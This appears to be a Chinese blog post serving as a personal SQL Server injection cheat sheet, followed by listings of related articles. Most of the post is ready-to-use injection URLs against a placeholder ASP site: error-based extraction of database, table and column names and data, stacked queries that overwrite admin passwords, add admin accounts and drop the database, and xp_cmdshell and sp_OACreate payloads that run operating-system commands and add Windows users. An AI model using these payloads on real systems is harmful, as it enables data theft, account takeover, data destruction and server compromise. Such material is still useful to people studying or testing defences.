SQL server 注入笔记(备查)

最新推荐文章于 2025-06-18 17:35:07 发布
原创 最新推荐文章于 2025-06-18 17:35:07 发布 · 1.6k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了SQL Server注入的各种方法,包括爆当前表中的列、任意表、任意列,以及如何爆出具体数据、修改管理员密码、添加管理员、删除数据库。此外,还探讨了如何判断系统是否支持多句查询和子查询,以及在拥有SA权限时如何利用扩展存储过程获取系统shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

例如:注入点 http://www.XX.com/index.asp?id=1

爆当前表中的列

1.1、http://www.XX.com/index.asp?id=1 and user>0
// 获得当前数据库用户名,user是SQL server的内置变量,运气好可获取用户名,‘dbo’是sa权限 public是public权限,类似SESSION_USER,CURRENT_USER,SYSTEM_USER.
1.2、http://www.XX.com/index.asp?id=1 and (select @@version)>0
//获得当前数据库版本
1.3、http://www.XX.com/index.asp?id=1 and db_name>0
//获得当前数据库名
2、http://www.XX.com/index.asp?id=1 having 1=1–
//为了爆列名和表名
3、http://www.XX.com/index.asp?id=1 group by 已知列1、已知列2 having 1=1–
//为了爆出更多列名

爆任意表

1、http://www.XX.com/index.asp?id=1 and(select top 1 name from (select top 1 id,name from sysobjects where xtype=char(85))T order by id desc)>1
//TOP 子句用于规定要返回的记录的数目。
//char(85)=U 表示用户表
//给查找出来的虚拟表命名为T
//ORDER BY 语句用于根据指定的列对结果集进行排序。默认升序 ,降序用 DESC 关键字。
//得到的是varchar型表名,跟1做比较会强制转换为int 会失败。就可以报错得到表名
// sysobjects是系统表关于SQL Server数据库的一切信息都保存在它的系统表格里
这里写图片描述

爆任意表中任意列

1、http://www.XX.com/index.asp?id=1 and (select top 1 col_name(object_id(‘已知表名’),1) from sysojects)>1
// COL_NAME ( table_id , column_id )
table_id 包含数据库列的的标识号。table_id 属于 int 类型。
column_id 的标识号。column_id 参数属于 int 类型。
返回类型 sysname

爆出具体数据

1、http://www.XX.com/index.asp?id=1 and (select top 1 列名 from 表名 where id=N)>1
//猜解表中的列中的第N条数据

修改管理员密码

1、http://www.XX.com/index.asp?id=1;update 表名 set 列名=‘新内容’ where 名称=‘条件’

添加管理员

1、http://www.XX.com/index.asp?id=1;insert into 表名 values(姓名,密码)–

删除数据库

1、http://www.XX.com/index.asp?id=1;drop database 数据库名

判断是否支持多句查询、子查询

多句、http://www.XX.com/index.asp?id=1;declare @a int–
子查询、http://www.XX.com/index.asp?id=1and (select count(1) from [sysobjects])>=0

如果你有SA权限 得到shell

利用数据库扩展存储过程 exec master..xp_cmdshell 后面加上引号,引号内输入cmd命令就可执行

判断扩展存储过程判断是否存在: http://www.XX.com/index.asp?id=1 and SELECT count(*) FROM master.dbo.sysobjects WHERE stype=’x’ AND name=’xp_cmdshell’
恢复不存在的扩展存储过程: http://www.XX.com/index.asp?id=1;exec sp_addextendedproc xp_cmdshell,’xplog70.dll’
删除扩展存储过程: http://www.XX.com/index.asp?id=1;exec sp_addextendedproc ‘xp_cmdshell’

//反应正常说明存在
1、http://www.XX.com/index.asp?id=1;exec master..xp_cmdshell ‘dir c:\’
//查看c盘目录和文件
2、http://www.XX.com/index.asp?id=1;exec master..xp_cmdshell ‘net user 用户名 密码/add’
//添加用户

关键函数访问OLE控件 函数sp_OACreate 、 sp_OAMethod

1、http://www.XX.com/index.asp?id=1;DECLARE @S INT EXEC SP_OACREAT ‘wscript.shell’,@s exec master..SPOAMETHOD @s,’run’,null,’cmd.exe/c dir c:\’

SQL注入-基于MSsql(sql server)注入
LJH1999ZN的博客
02-13 7499
目录 一、如何判断该网站使用的是sql server 数据库 二、sql server 数据库包含三张主要系统表 三、sql server 主要函数 四、数据库的注入流程 五、sql server 的联合查询 六、sql server 的报错注入 七、sql server 的布尔型盲注。 一、如何判断该网站使用的是sql server 数据库 根据后缀判断:如果后缀为aspx,数据库大概是sql server 根据报错信息判断,报错信息中有Microsoft 字样。 根据系统表判断,a
SQL server手工注入入门
无心的博客
10-26 518
目录 0x01 SQL server基础 0x02 基本注入 SQL server部分版本已被黑客安装后门,详情请在文末查看。 0x01 SQL server基础 在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作 系统库 master master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行...
sqlserver注入
ka_ka11的博客
04-22 681
1.判断权限大小,即xcmd_shell能不能用 2.数据库,表,列的逻辑问题
SQL注入分类,一看你就明白了,(非常详细)从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
06-18 1081
字符可以使用单引号包裹,也可以使用双引号包裹,根据包裹字符串的「引号」不同,字符型注入可以分为:「单引号字符型」注入和「双引号字符型」注入。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」参数使用「单引号」包裹时,叫做单引号字符型注入,比如下面这个SQL,就是单引号字符型注入参数使用「双引号」包裹时,叫做双引号字符型注入,比如下面这个SQL,就是双引号字符型注入。后台对应的SQL如下,字段类型是字符型,这种就是字符型注入
SQL Server 注入
mingyqf的博客
03-22 2673
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
三步堵死 SQL Server注入漏洞
12-15
SQL注入是什么? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,...
SQLserver2008学习笔记
08-11
SQL server 2008
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL Server注入
weixin_34129145的博客
11-05 137
1.利用错误消息提取信息 1.1 枚举当前表与列 select * from users where username='root' and password='root' having 1=1--' 抛出错误:选择列表中的列 'users.id' 无效,因为该列没有包含在聚合函数或 GROUP BY 子句中。   发现表名为 'users',存在列名为 'id' sele...
SQL Server注入大全及防御
网络 人生 学习 进步
09-17 1507
  SQL Server是中小型网站广泛使用的数据库,由于功能强大也滋生了很多安全问题,国内又因为SQL注入攻击的很长一段时间流行,导致对SQL Server的入侵技巧也层出不穷,由于SQL Server支持多语句,相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法,而直接转向使用SQL Server的存储过程和函数快速的拿权限,下面我就围绕SQL Server的系
SQLServer 注入工具 v1.0
01-13
利用SQL Server注入漏洞实现猜解数据库名,表名,字段名及记录的信息,由于网速的原因,目前限制了只能同时猜解前5个字段值的记录信息。另外实现了三种方式执行系统命令,同时可回显显示。本程序只供测试研究使用,由此软件造成的后果一概不负责任,由于编写比较仓促,代码难免有纰漏之处,欢迎大家批评指正。作者:Hnxyy QQ:190266952004.12.16 北京FireFox技术交流论坛http://www.wrsky.com临时访问地址http://firefoxer.nease.netIt is all beginnings freeIt is all ruin to be privately owned
Sql serversql注入
12-14
SQL Injection   关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下   防范sql注入的方法无非有以下几种:   1.使用类型安全的SQL参数   2.使用参数化输入存储过程   3.使用参数集合与动态SQL   4.输入滤波   5.过滤LIKE条款的特殊字符   …如果有遗漏的也欢迎园子的大大们指教。   Sample:   var Shipcity;   ShipCity = Request.form ("ShipCity");   var sql = "select * from
SQL Server手工注入方式
渗透之路,攻防之间皆学问
01-04 7218
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
你们de4月天的博客
09-07 1418
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
SqlServer基本注入
adaosanqian的博客
02-28 3849
SQLserver基本注入的基础知识理解
SQLServer数据库注入测试
Jietewang的博客
04-11 1247
Part one:How phpstudy connects to SQL Server 2008 总结一下:使用PHPstudy集成环境中的php5.4.45连接SQL server 2008相关坑点。 在百度上能搜索到的大部份方法都是有效的,但是如果你是一个运气不太好的新手的话估计就要耗费你太多的精力。 首先需要明白的是Windows下的安装的PHPstudy集成环境是不能直接使用PHP连接数据库SQL Server 2008。这本身就是一个很恼火的事情,随着时代的进步,科技的发展,现在的人儿啊尽
1、sql server数据库进行sql注入
weixin_51520483的博客
05-15 1331
1、判断数据类型是很重要的一点,影响后面的注入语句2、确定列数时,要多测几组数据,从而分析判断列数,并不是遇到第一个报错就停止测试3、正常网页(例如id=1,参数正确)没有注入回显时,试试报错情况(id=-1),注入回显有可能被正常返回数据覆盖4、注入回显的字段有可能整形、字符、小数等,注意是否需要单引号5、最好先全部统一会先字段类型,比如全部整形,挨个轮流改变为字符形。
sqlserver注入测试
weixin_48776804的博客
07-24 359
sqlserver注入测试
SQL Server客户端安装简易指南
标题中提到的“SQL Server客户端安装包”指的是微软公司开发的关系型数据库管理系统SQL Server的客户端组件。客户端安装包通常包含了访问SQL Server服务器所必需的软件组件和配置工具。 描述部分指出了安装SQL ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值